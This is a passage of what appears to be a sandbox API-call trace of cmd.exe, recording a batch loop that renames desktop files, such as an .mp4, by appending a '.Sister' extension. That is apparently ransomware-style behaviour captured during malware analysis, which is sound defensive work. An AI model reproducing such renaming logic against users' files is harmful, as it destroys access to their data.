hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0156.818] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0156.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0156.818] GetFileType (hFile=0x50) returned 0x2 [0156.819] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0156.819] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0156.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0156.909] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0156.984] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0156.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0156.984] GetFileType (hFile=0x50) returned 0x2 [0156.984] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0156.984] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0157.202] _get_osfhandle (_FileHandle=1) returned 0x50 [0157.202] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0157.285] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0157.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0157.285] GetFileType (hFile=0x50) returned 0x2 [0157.285] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0157.285] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0157.378] _get_osfhandle (_FileHandle=1) returned 0x50 [0157.378] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0157.522] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0157.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0157.522] GetFileType (hFile=0x50) returned 0x2 [0157.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0157.522] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0157.638] _get_osfhandle (_FileHandle=1) returned 0x50 [0157.638] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0157.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0157.733] GetFileType (hFile=0x50) returned 0x2 [0157.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0157.733] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0157.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0157.827] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9431250*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9431250*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0157.931] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Mhg3G6nMJa5mU0.mp4.Sister\" \"Mhg3G6nMJa5mU0.bat\" ") returned 50 [0157.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0157.931] GetFileType (hFile=0x50) returned 0x2 [0157.931] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0157.931] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0157.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0157.980] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x32, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x32) returned 1 [0158.113] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0158.113] _get_osfhandle (_FileHandle=1) returned 0x50 [0158.113] GetFileType (hFile=0x50) returned 0x2 [0158.113] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0158.113] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0158.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0158.190] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0158.278] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0158.398] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0158.398] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0158.398] malloc (_Size=0xffce) returned 0x21ed921fd40 [0158.398] ??_V@YAXPEAX@Z () returned 0x21ed921fd40 [0158.398] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0158.398] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0158.398] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0158.398] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0158.398] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0158.398] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0158.398] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0158.398] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0158.398] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0158.398] ??_V@YAXPEAX@Z () returned 0x1 [0158.398] GetProcessHeap () returned 0x21ed8c70000 [0158.398] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8d636f0 [0158.399] GetProcessHeap () returned 0x21ed8c70000 [0158.399] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d636f0, Size=0x74) returned 0x21ed8d636f0 [0158.399] GetProcessHeap () returned 0x21ed8c70000 [0158.399] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d636f0) returned 0x74 [0158.399] GetProcessHeap () returned 0x21ed8c70000 [0158.399] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed8c73ec0 [0158.399] GetProcessHeap () returned 0x21ed8c70000 [0158.399] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xd8) returned 0x21ed8d63980 [0158.399] GetProcessHeap () returned 0x21ed8c70000 [0158.399] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63980, Size=0x74) returned 0x21ed8d63980 [0158.399] GetProcessHeap () returned 0x21ed8c70000 [0158.399] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63980) returned 0x74 [0158.399] malloc (_Size=0xffce) returned 0x21ed921fd40 [0158.399] ??_V@YAXPEAX@Z () returned 0x21ed921fd40 [0158.399] GetProcessHeap () returned 0x21ed8c70000 [0158.399] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42f10 [0158.399] GetProcessHeap () returned 0x21ed8c70000 [0158.399] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93752f0 [0158.399] _wcsicmp (_String1="Mhg3G6nMJa5mU0.mp4", _String2=".") returned 63 [0158.399] _wcsicmp (_String1="Mhg3G6nMJa5mU0.mp4", _String2="..") returned 63 [0158.399] GetFileAttributesW (lpFileName="Mhg3G6nMJa5mU0.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\mhg3g6nmja5mu0.mp4")) returned 0x20 [0158.400] GetProcessHeap () returned 0x21ed8c70000 [0158.400] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9431430 [0158.401] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9431440 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0158.401] SetErrorMode (uMode=0x0) returned 0x0 [0158.401] SetErrorMode (uMode=0x1) returned 0x0 [0158.401] GetFullPathNameW (in: lpFileName="Mhg3G6nMJa5mU0.mp4", nBufferLength=0x7fe7, lpBuffer=0x21ed921fd40, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Mhg3G6nMJa5mU0.mp4", lpFilePart=0xa6cf4fd660*="Mhg3G6nMJa5mU0.mp4") returned 0x2a [0158.401] SetErrorMode (uMode=0x0) returned 0x1 [0158.402] GetProcessHeap () returned 0x21ed8c70000 [0158.402] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9376190 [0158.402] _wcsicmp (_String1="Mhg3G6nMJa5mU0.mp4", _String2=".") returned 63 [0158.402] _wcsicmp (_String1="Mhg3G6nMJa5mU0.mp4", _String2="..") returned 63 [0158.402] GetFileAttributesW (lpFileName="Mhg3G6nMJa5mU0.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\mhg3g6nmja5mu0.mp4")) returned 0x20 [0158.402] ??_V@YAXPEAX@Z () returned 0x1 [0158.402] malloc (_Size=0xffce) returned 0x21ed921fd40 [0158.402] ??_V@YAXPEAX@Z () returned 0x21ed921fd40 [0158.402] malloc (_Size=0xffce) returned 0x21ed922fd20 [0158.402] ??_V@YAXPEAX@Z () returned 0x21ed922fd20 [0158.402] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Mhg3G6nMJa5mU0.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\mhg3g6nmja5mu0.mp4")) returned 0x20 [0158.402] malloc (_Size=0xffce) returned 0x21ed923fd00 [0158.402] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0158.402] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Mhg3G6nMJa5mU0.mp4", fInfoLevelId=0x1, lpFindFileData=0x21ed9375300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9375300) returned 0x21ed8d43090 [0158.403] malloc (_Size=0xffce) returned 0x21ed924fce0 [0158.403] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0158.404] ??_V@YAXPEAX@Z () returned 0x1 [0158.404] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Mhg3G6nMJa5mU0.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\mhg3g6nmja5mu0.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\Mhg3G6nMJa5mU0.mp4.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\mhg3g6nmja5mu0.mp4.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0158.488] FindNextFileW (in: hFindFile=0x21ed8d43090, lpFindFileData=0x21ed9375300 | out: lpFindFileData=0x21ed9375300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9bdbd0, ftCreationTime.dwHighDateTime=0x1d5ebdb, ftLastAccessTime.dwLowDateTime=0x2c541020, ftLastAccessTime.dwHighDateTime=0x1d5e64b, ftLastWriteTime.dwLowDateTime=0x2c541020, ftLastWriteTime.dwHighDateTime=0x1d5e64b, nFileSizeHigh=0x0, nFileSizeLow=0xc828, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mhg3G6nMJa5mU0.mp4", cAlternateFileName="")) returned 0 [0158.490] GetLastError () returned 0x12 [0158.490] FindClose (in: hFindFile=0x21ed8d43090 | out: hFindFile=0x21ed8d43090) returned 1 [0158.490] ??_V@YAXPEAX@Z () returned 0x1 [0158.490] ??_V@YAXPEAX@Z () returned 0x1 [0158.492] ??_V@YAXPEAX@Z () returned 0x1 [0158.493] ??_V@YAXPEAX@Z () returned 0x1 [0158.493] GetProcessHeap () returned 0x21ed8c70000 [0158.493] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43090 [0158.493] GetProcessHeap () returned 0x21ed8c70000 [0158.493] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95a60, Size=0x16) returned 0x21ed8c95780 [0158.493] GetProcessHeap () returned 0x21ed8c70000 [0158.493] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95780) returned 0x16 [0158.493] GetProcessHeap () returned 0x21ed8c70000 [0158.494] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0158.494] GetProcessHeap () returned 0x21ed8c70000 [0158.494] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0158.494] GetProcessHeap () returned 0x21ed8c70000 [0158.494] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d63a10 [0158.494] GetProcessHeap () returned 0x21ed8c70000 [0158.494] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63a10, Size=0xb2) returned 0x21ed8d63a10 [0158.494] GetProcessHeap () returned 0x21ed8c70000 [0158.494] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63a10) returned 0xb2 [0158.494] GetProcessHeap () returned 0x21ed8c70000 [0158.494] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93783e0 [0158.494] GetProcessHeap () returned 0x21ed8c70000 [0158.494] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93783e0, Size=0x30) returned 0x21ed93783e0 [0158.494] GetProcessHeap () returned 0x21ed8c70000 [0158.494] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93783e0) returned 0x30 [0158.495] GetProcessHeap () returned 0x21ed8c70000 [0158.495] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9378420 [0158.495] malloc (_Size=0x1ff9c) returned 0x21ed921fd40 [0158.496] GetProcessHeap () returned 0x21ed8c70000 [0158.496] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d466d0 [0158.496] GetProcessHeap () returned 0x21ed8c70000 [0158.496] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d46910 [0158.496] ??_V@YAXPEAX@Z () returned 0x1 [0158.496] malloc (_Size=0x1ff9c) returned 0x21ed921fd40 [0158.496] GetProcessHeap () returned 0x21ed8c70000 [0158.496] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937cc10 [0158.497] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed921fd40, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0158.497] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65640 [0158.497] FindClose (in: hFindFile=0x21ed8d65640 | out: hFindFile=0x21ed8d65640) returned 1 [0158.497] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65820 [0158.497] FindClose (in: hFindFile=0x21ed8d65820 | out: hFindFile=0x21ed8d65820) returned 1 [0158.497] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x89066700, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x89066700, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64fe0 [0158.498] FindClose (in: hFindFile=0x21ed8d64fe0 | out: hFindFile=0x21ed8d64fe0) returned 1 [0158.498] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x89066700, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x89066700, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8c00cc0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0158.498] malloc (_Size=0x1ff9c) returned 0x21ed923fcf0 [0158.498] ??_V@YAXPEAX@Z () returned 0x21ed923fcf0 [0158.500] GetProcessHeap () returned 0x21ed8c70000 [0158.500] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67d30 [0158.500] ??_V@YAXPEAX@Z () returned 0x1 [0158.500] ??_V@YAXPEAX@Z () returned 0x1 [0158.500] GetProcessHeap () returned 0x21ed8c70000 [0158.500] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9378420, Size=0x490) returned 0x21ed9378420 [0158.500] GetProcessHeap () returned 0x21ed8c70000 [0158.500] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9378420) returned 0x490 [0158.500] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0158.500] _get_osfhandle (_FileHandle=1) returned 0x50 [0158.500] GetFileType (hFile=0x50) returned 0x2 [0158.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0158.500] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0158.588] _get_osfhandle (_FileHandle=1) returned 0x50 [0158.588] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0158.721] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0158.721] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0158.721] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0158.721] _get_osfhandle (_FileHandle=1) returned 0x50 [0158.721] GetFileType (hFile=0x50) returned 0x2 [0158.721] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0158.721] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0158.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0158.795] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0158.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0158.939] GetFileType (hFile=0x50) returned 0x2 [0158.939] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0158.939] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0159.136] _get_osfhandle (_FileHandle=1) returned 0x50 [0159.136] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93783f0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed93783f0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0159.213] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0159.213] _get_osfhandle (_FileHandle=1) returned 0x50 [0159.213] GetFileType (hFile=0x50) returned 0x2 [0159.213] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0159.213] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0159.286] _get_osfhandle (_FileHandle=1) returned 0x50 [0159.286] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0159.470] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0159.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0159.471] GetFileType (hFile=0x50) returned 0x2 [0159.471] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0159.471] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0159.592] _get_osfhandle (_FileHandle=1) returned 0x50 [0159.592] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0159.698] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0159.776] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0159.776] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0159.776] malloc (_Size=0xffce) returned 0x21ed921fd40 [0159.777] ??_V@YAXPEAX@Z () returned 0x21ed921fd40 [0159.777] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0159.777] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0159.778] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0159.778] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0159.778] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0159.778] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0159.778] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0159.778] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0159.778] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0159.778] ??_V@YAXPEAX@Z () returned 0x1 [0159.778] GetProcessHeap () returned 0x21ed8c70000 [0159.778] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8c75790 [0159.778] GetProcessHeap () returned 0x21ed8c70000 [0159.778] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75790, Size=0x130) returned 0x21ed8c75790 [0159.778] GetProcessHeap () returned 0x21ed8c70000 [0159.778] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75790) returned 0x130 [0159.778] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.778] malloc (_Size=0xffce) returned 0x21ed921fd40 [0159.778] ??_V@YAXPEAX@Z () returned 0x21ed921fd40 [0159.778] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0159.778] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed921fd40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0159.780] ??_V@YAXPEAX@Z () returned 0x1 [0159.780] GetProcessHeap () returned 0x21ed8c70000 [0159.780] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62e50 [0159.780] GetProcessHeap () returned 0x21ed8c70000 [0159.781] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8c758d0 [0159.781] GetProcessHeap () returned 0x21ed8c70000 [0159.781] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758d0, Size=0x130) returned 0x21ed8c758d0 [0159.781] GetProcessHeap () returned 0x21ed8c70000 [0159.781] 